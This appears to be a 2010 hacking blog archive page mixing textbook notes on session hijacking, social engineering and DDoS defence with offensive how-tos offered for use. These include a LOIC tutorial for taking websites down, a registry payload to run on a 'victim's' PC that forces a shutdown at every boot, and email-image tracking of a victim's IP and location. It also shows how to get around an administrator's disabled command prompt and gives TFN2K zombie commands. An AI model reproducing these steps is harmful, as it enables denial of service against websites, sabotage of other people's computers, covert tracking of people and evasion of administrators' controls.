Home » Archives for March 2010
Protecting against Session Hijacking
-
Use Encryption -
Use a secure protocol -
Limit incoming connections -
Minimize remote access -
Have strong authentication.
Countermeasure | When practical, limit successful sessions to specific IP addresses. This usually only works when dealing within an intranet setting, where the IP ranges are predictable and finite. |
Countermeasure | Re-authenticate the user before critical actions are performed. If possible, try to limit unique session tokens to each browser instance (e.g. generate the token with a hash of the MAC address of the computer and process id of the browser, etc.) Configure the appropriate spoof rules on gateways (internal and external). Monitor for ARP cache poisoning, by using IDS products or ARPwatch. |
Countermeasure | Use x.509 certificates to prevent more traditional types of TCP hijacking. |
Countermeasure | Use encryption. This can be done by one or more of the following.
|
Countermeasure | Use strong authentication (like Kerberos) or peer-to-peer VPN's. |

Remote TCP Session Reset Utility
-
Start up the remote TCP session reset -
Enter the IP address of the machine whose connection is to be reset. -
Enter the read-write community string. -
Click on connect to retrieve a list of active TCP connections -
Click on the connection that is to be disconnected, and select 'Break' from the toolbar.

Programs that perform Session Hijacking
-
There are several programs available that perform session hijacking. Following are a few that belongs to this category:-
Juggernaut -
Hunt -
TTY Watcher -
IP Watcher -
T-Sight
-
-
Juggernaut -
TTY Watcher -
IP Watcher -
T-Sight -
Hunt
-
Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux Operating systems. -
Juggernaut can be set to watch for all network traffic or it can be given a keyword like password to look out for. -
The main function of this program is to maintain information about various session connections that are occurring on the network. -
The attacker can see all the
Juggernaut is basically a network sniffer that can also be used to hijack TCP sessions. It runs on Linux and has a Trinux module as well. Juggernaut can be activated to watch all network traffic on the local network.For example, Juggernaut can be configured to wait for the login prompt, and then record the network traffic that follows (usually capturing the password). By doing so, this tool can be used to capture certain types of traffic by simply leaving the tool running for a few days, and then the attacker just has to pick up the log file that contains the recorded traffic. This is different than regular network sniffers that record all network traffic making the log files extremely huge (and thus easy to detect).However, the main feature of this program is its ability to maintain a connection database. This means an attacker can watch all the TCP based connection made on the local network, and possibly "hijack" the session. After the connection is made, the attacker can watch the entire session (for a telnet session, this means the attacker sees the "playback" of the entire session. This is like actually seeing the telnet window).When an active session is watched, the attacker can perform some actions on that connection, besides passively watching it. Juggernaut is capable of resetting the connection (which basically means terminating it), and also hijacking the connection, allowing the attacker to insert commands in the session or even to completely take the session into his hands (resetting connection on the legitimate client). sessions and he can pick a session he wants to hijack.

Sequence Numbers - crucial to hijacking a session
-
Sequence Numbers are very important to provide reliable communication but they are also crucial to hijacking a session. -
Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations. -
The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received. -
Therefore an attacker must successfully guess the sequence number to hijack a session.
Threat | If a sequence number within the receive window is known, an attacker can inject data into the session stream or choose to terminate the connection. If the attacker knows the initial sequence number, he can send a simple packet to inject data or kill the session if he is aware of the number of bytes transmitted in the session this far. |

Hack a website with denial of service attack
Now i will show you how to hack a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.
Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
Step 4: Click the big button " IMMA FIRIN MAH LAZAR!"
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

HOW TO MODIFY *.EXE FILES
learn how to change *.exe files, in 5 easy steps:
1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.
try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at http://www.users.on.net/johnson/resourcehacker/
2) Unzip the archive, and run ResHacker.exe. You can check out the help file too
3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.
4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.
5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.
TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

Yahoo Messenger multiple logins
Yahoo Messenger trick-How to open Multiple Yahoo Messenger???
1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's

shutdown your friend's computer everytime it start:
Thats really easy.
put this followin text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
indows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.
You can also put this in a javascript code, just add this code to your webpage:
Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.
well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.
ENJOY !!!

Types of session Hijacking
-
ActiveIn an active attack, an attacker finds an active session and takes over. -
PassiveWith a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.
Session hijacking can be active or passive in nature depending on the degree of involvement of the attacker in the attack. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session. |

Steps in Session Hijacking
-
Tracking the session -
Desynchronizing the connection -
Injecting the attacker's packet
How does an attacker go about hijacking a session? The hijack can be broken down into four broad phases. |
-
Tracking the connectionThe attacker will wait to find a suitable target and host. He use a network sniffer to track the victim and host or identify a suitable user by scanning with a scanning tool such as nmap to find a target with a trivial TCP sequence prediction. This is done to ensure that because the correct sequence and acknowledgement numbers are captured, as packets are checked by TCP through sequence and/or acknowledgement numbers. These will later be used by the attacker in crafting his own packets. -
Desynchronizing the connectionA desynchronized state is when a connection between the target and host is in the established state; or in a stable state with no data transmission; or the server's sequence number is not equal to the client's acknowledgement number; or the clients sequence number is not equal to the server's acknowledgement number. To desynchronize the connection between the target and host, the sequence number or the acknowledgement number (SEQ/ACK) of the server must be changed. This can be done if null data is sent to the server so that the server's SEQ/ACK numbers will advance; while the target machine will not register such an increment.The desynchronizing is preceded by the attacker monitoring the session without interference till an opportune moment, when he will send a large amount of " null data" to the server. This data serves only to change the ACK number on the server and does not affect anything else. The attacker does likewise to the target also. Now both the server and target are desynchronized. -
Resetting the connectionAnother approach is to send a reset flag to the server and tearing down the connection on the server side. This is ideally done in the early setup stage. The goal of the attacker is to break the connection on the server side and create a new one with different sequence number.The attacker listens for a SYN/ACK packet from the server to the host. On detecting the packet, he sends an RST to the server and a SYN packet with exactly the same parameters such as port number but a different sequence number. The server on receiving the RST packet, closes connection with the target, but initiates another one based on the SYN packet - with a different sequence number on the same port. Having opened a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this and sends back an ACK packet to the server. Now, the server is in the established state. The target is oblivious to the conversation and has already switched to the established state when it received the first SYN/ACK packet from the server. Now both server and target are in desynchronized but established state.This can also be done using a FIN flag, but this will cause the server to respond with an ACK and give away the attack through an ACK storm. This results due to a flaw in this method of hijacking a TCP connection. When receiving an unacceptable packet the host acknowledges it by sending the expected sequence number and using its own sequence number. This packet is itself unacceptable and will generate an acknowledgement packet which in turn will generate an acknowledgement packet, thereby creating a supposedly endless loop for every data packet sent. The mismatch in SEQ/ACK numbers results in excess network traffic with both the server and target trying to verify the right sequence. Since these packets do not carry data they are not retransmitted if the packet is lost. However, since TCP uses IP the loss of a single packet puts an end to the unwanted conversation between the server and target on the network.The desynchronizing stage is added in the hijack sequence so that the target host is kept in the dark about the attack. Without desynchronizing, the attacker will still be able to inject data to the server and even keep his identity by spoofing an IP address. However, he will have to put up with the server's response being relayed to the target host as well. -
Injecting the attacker's packetNow that the attacker has interrupted the connection between the server and target, he can choose to either inject data into the network or actively participate as the "man in the middle", and pass data from the target to the server, and vice versa, reading and injecting data as he sees fit.
-
Alice opens a telnet session to Bob and starts doing some work. -
Eve observes the connection between Alice and Bob using a sniffer that is integrated into her hijacking tool. Eve makes a note of Alice's IP address and her hijacking software samples the TCP sequence numbers of the connection between Alice and Bob. -
Eve launches a DoS attack against Alice to stop Alice doing further work on Bob and to prevent an ACK storm from interfering with her attack. -
Eve generates spoofed packets with the correct TCP sequence numbers and connects to Bob. -
Bob thinks that he is still connected to Alice. -
Alice notices a lack of response from Bob and blames it on the network. -
Eve finds herself at a root prompt on Bob. She issues some commands to make a backdoor and uses the sniffer to observe the responses from Bob. -
After covering her tracks, Eve logs out of Bob and ceases the DoS attack against Alice. -
Alice notices that her connection to Bob has been dropped. -
Eve uses her backdoor to get directly into Bob.

Spoofing Vs Hijacking
The early record of a session hijacking is perhaps the Morris Worm episode that affected nearly 6000 computers on the ARPANET in 1988. This was ARPANET's first automated network security incident. Robert T. Morris wrote a program that would connect to another computer, find and use one of several vulnerabilities to copy itself to that second computer, and begin to run the copy of itself at the new location. Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET. |
Blind IP spoofing involves predicting the sequence numbers that the victimized host will send in order to create a connection which appears to originate from the host. Before exploring blind spoofing further, let us take a look at sequence number prediction. |
When an attacker uses captured, reverse engineered or brute forced authentication tokens to take over the control of a legitimate user's session while he is in session, the session is said to be hijacked. Due to this attack, the legitimate user may loose access or be deprived of the normal functionality of the session to the attacker, who now acts with the user's privileges. |
Session hijacking is even more difficult than IP address spoofing. In session hijacking, John would seek to insert himself into a session that Jane already had set up with \\Mail. John would wait until Jane established a session, then knock her off the air by some means and pick up the session as though he was her. As before, John would send a scripted set of packets to \\Mail but would not be able to see the responses. To do this, he would need to know the sequence number in use when he hijacked the session, which could be calculated knowing the ISN and the number of packets that have been exchanged. |

Understanding session hijacking

Enumerate User Information

Social Engineering Techniques: Dumpster Diving

Common Types of Social Engineering
-
Human-based Social Engineering refers to person to person interaction to retrieve the desired information. -
Computer based Social Engineering refers to having computer software that attempts to retrieve the desired information
Reciprocation | Someone is given a "token" and feels compelled to take action. | You buy the wheel of cheese when given a free sample. |
Consistency | Certain behavior patterns are consistent from person to person. | If you ask a question and wait, people will be compelled to fill the pause. |
Social Validation | Someone is compelled to do what everyone else is doing. | Stop in the middle of a busy street and look up; people will eventually stop and do the same. |
Liking | People tend to say yes to those they like, and also to attractive people. | Attractive models are used in advertising. |
Authority | People tend to listen and heed the advice of those in a position of authority. | "Four out of five doctors recommend...." |
Scarcity | If someone is in low supply, it becomes more "precious" and, therefore, more appealing. | Furbees or Sony Playstation 2. |
Source: Gartner Research |

Know Someone’s IP & Location via Email
Getting someone’s IP Address or location was never so easy!
There’s a site which allows you to know the IP, Location, etc… of a person just by sending an email. The site is www.SpyPig.com , which is actually meant for tracking emails but it can be used for getting such info also :P
For doing all this, you just need to attach an image provided by SpyPig. If you want, you can also use your images by making an ID @ SpyPig.com .
To make the SpyPig image work, the victim must enable images in emails (which is usually disabled by default!). To make my victim do this, I made an ID at SpyPig.com and added some wallpapers, and used them as SpyPig images and requested my victim to Enable images to view the wallpapers…

USB flash drive portable browsers
Have you ever been some place other than your home on your computer? If your answer is anything other then yes, you need to stop being a computer hugging hippy and go outside, get a whif of some fresh air, step on some dog crap and accidently run over a cat. It’ll do you some good. Anyways, have you visited someone somewhere and while using his/her/its computer, you realized you didn’t know a password because it was saved on your browser, or you wanted to show your friend that one cool website with the non-Asian ninjas, but it was in your bookmarks, or you wanted to use an extension you had installed on your browser that got rid of homosexual ads? Well you can. It’s called portable browsers, a.k.a a browser on your USB drive.
If you use Mozilla Firefox, which I highly recommend, you can download the portable browser hiya: I’m a link.
If you’re an apple fanboy or just like safari, you can download it’s portable version hiya: I’m a link too.
If you use Internet Explorer, you must have some sort of brain blockage and need to fall off a cliff.
Some great features of these portable browsers are:
- you can take your bookmarks with you
- although probably not a good idea, for those of you that happen to always kill the braincells holding your passwords, you can take the saved one’s with you
- take all your extensions with you
- keeps your information stored on the flash drive instead of the computer you are using

How to get command prompt
In many public places like schools and libraries, the system administrators disable CMD.EXE but forget about the older version, COMMAND.COM. When trying to access CMD.EXE, if you are displayed with the
following message
:
then you know it is disabled for your user level.
To get a COMMAND.COM prompt up, open Notepad.exe and type in “command.com” without the quotes. Next, save it as a batch file via the “.bat” extention. So save it as “anything.bat” . Now once you double click this file, you should get a functional command prompt if it isn’t disabled.

Social Engineering: Art of Manipulation
-
What is Social Engineering? -
Common Types of Attacks -
Social Engineering by Phone -
Dumpster Diving -
Online Social Engineering -
Reverse Social Engineering -
Policies and Procedures -
Employee Education
-
Social Engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action. -
Companies with authentication processes, firewalls, virtual private networks and network monitoring software are still wide open to attacks -
An employee may unwittingly give away key information in an email or by answering questions over the phone with someone they don't know or even by talking about a project with co workers at a local pub after hours.
-
Social Engineering includes acquisition of sensitive information or inappropriate access privileges by an outsider, based upon building of inappropriate trust relationships with outsiders. -
The goal of a social engineer is to trick someone into providing valuable information or access to that information. -
It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble.
-
Social engineering is hacker jargon for getting needed information from a person rather than breaking into a system. -
Psychological subversion is the term for using social engineering over an extended period of time to maintain a continuing stream of information and help from unsuspecting users.
-
People are usually the weakest link in the security chain. -
A successful defense depends on having good policies in place and educating employees to follow the policies. -
Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.
Social engineering concentrates on the weakest link of the computer security chain. It is often said that the only secure computer is an unplugged one. The fact that you could persuade someone to plug it in and switch it on means that even powered down computers is vulnerable. |

Denial of Service attacks : Summary
-
Denial of Service is a very commonly used attack methodology. -
Distributed Denial Of Service using a multiplicity of Zombie machines is an often seen attack methodology. -
There are various tools available for attackers to perpetrate DOS attacks
Protection against DOS is difficult due to the very nature of the attacks.-
Different scanning tools are available to aid detection and plugging of vulnerabilities leading to DOS

Use Scanning Tools : Denial of Service attacks
-
Find_ddos -
SARA -
DDoSPing v2.0 -
RID -
Zombie Zapper
Find_DDoS The tool find_ddos is intended to scan a local system that is either known or suspected to contain a DDOS program. It is capable of scanning executing processes on Solaris 2.6 or later, and of scanning local files on a Solaris 2.x (or later) system. |
-
mstream master -
mstream server -
stacheldraht client -
stacheldraht daemon -
stacheldraht master -
tfn-rush client -
tfn client -
tfn daemon -
tfn2k client -
tfn2k daemon -
trinoo daemon -
trinoo master
./find_ddos [-g grabdir] [-1 logfile] [-p] [-v] [-V] [-x exclude1] [scandir]
RID RID (remote intrusion detector) is a tool programmed in C that is a highly configurable packet snooper and generator. It works by sending out packets defined in the config.txt file, then listening for appropriate replies. |
-
The Trinoo distributed denial of service attack client. -
The Tribal flood network distributed denial of service attack client. -
The StachelDraht distributed denial of service attack client.
Example: # Sample config file start AgentStacheldraht send icmp type=0 id=668 data=""
recv icmp type=0 id=669 data="sicken" nmatch=2 end AgentStacheldraht
---
Zombie ZapperZombie Zapper works against Trinoo, TFN, Stacheldraht, Troj_Trinoo (Windows port of Trinoo), and Shaft. Assuming that

Common IDS systems
- Shareware
-
Snort -
Shadow -
Courtney -
Commercial -
ISS RealSecure -
Axent NetProwler -
Cisco Secure ID (Net Ranger) -
Network Flight Recorder -
Network Security Wizard's Dragon
-
Shareware -
Snort -
Shadow -
Courtney -
Commercial -
ISS RealSecure -
Axent NetProwler -
Cisco Secure ID (Net Ranger) -
Network Flight Recorder -
Network Security Wizard's Dragon
........................................................................................................................... ............................................................................................................................................................................. ..................................................

Preventing the DDoS
Important things to do as a current or potential victim of packet flooding Denial of Service are given below: |

Preventing DoS Attacks
-
Effective robust design -
Bandwidth limitations -
Keep systems patched -
Run the least amount of services -
Allow only necessary traffic -
Block IP addresses
The DoS and DDoS attacks in combination with malicious codes implantations are easily launched but difficult to completely stop. With the nature of TCP/IP and programming issues that are often overlooked, the current Internet is still vulnerable to various forms of DoS and DDoS attacks. There is no "silver bullet" solution to this, like many other security issues. |
-
Timely application of patches and system updates, especially to potentially exposed machines. For example, update and maintain a current build of BIND on DNS servers. -
Deployment of only strictly necessary network services -
Intrusion detection systems -
Firewalls -
Anti-virus software -
Good password policies -
Use of Tripwire or other similar tools to detect changes in configuration information or other important files -
Paying heed to "Top 20" vulnerability lists provided by the information security community and evaluating these risks against one's environment -
Establishment and maintenance of regular backup schedules and policies -
As a network is only as secure as its weakest link, protection of mobile and remote machines with personal firewall/intrusion detection software

Tribe Flood Network : Tools Trinoo, TFN2K & Stacheldraht
-
Could be thought of as 'son of trinoo' -
Improved on some of the weaknesses of trinoo by adding different types of attacks that could be mounted against the victim site. -
Structured like trinoo with attackers, clients (masters) and daemons. -
Initial system compromise allows the TFN programs to be installed.
Tribe Flood Network, like trinoo, uses a master program to communicate with attack agents located across multiple networks. TFN launches coordinated Denial of Service Attacks that are especially difficult to counter as it can generate multiple types of attacks and it can generate packets with spoofed source IP addresses. Some of the attacks that can be launched by TFN include UDP flood, TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast. The basic characteristics of and suggested defense strategies against the TFN DDoS attack follow. |
-
To initiate TFN, the attacker accesses the master program and sends it the IP address of one or more targets. The master program proceeds to communicate with all of the agent programs, instructing them to initiate the attack.-
Communications between TFN master programs and agent programs use ICMP echo reply packets, where the actual instruction to be carried out is embedded in the 16-bit ID field in binary format. The use of ICMP (Internet Control Message Protocol) makes packet protocol filtering possible.-
TFN agents can be defeated by configuring your router or intrusion detection system to disallow all ICMP echo and echo reply packets onto your network. However, this will break all internet programs (such as "ping") that utilize these functions.
-
-
The TFN master program reads a list of IP addresses containing the locations of the agents programs. This list of addresses may be encrypted, using "Blowfish" encryption.-
If it is not encrypted, then the agents can be identified from the list.
-
-
The TFN agent programs have been found on systems with the filename td and the master programs with the name tfn. They can be positively identified by running the UNIX strings command.-
TFN agents do not check where the ICMP echo reply packets come from. Therefore, it is possible to forge ICMP packets to flush out these processes.
-
-
-
TFN2K is a DDOS program which runs in distributed mode. There are two parts to the program: client and server. -
The server (also known as zombies) runs on a machine in listening mode and waits for commands from the client.Running the server #td Running the client #tn -h 23.4.56.4 -c8 -i 56.3.4.5
The TFN2K distributed denial of service system consists of client/server architecture. |
Attack Methods | The Attack: The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. |
-
Client to Handler: 16660 TCP -
Handler to and from agents: 65000 ICMP
Stacheldraht consists of three parts: the master server, client, and agent programs. |
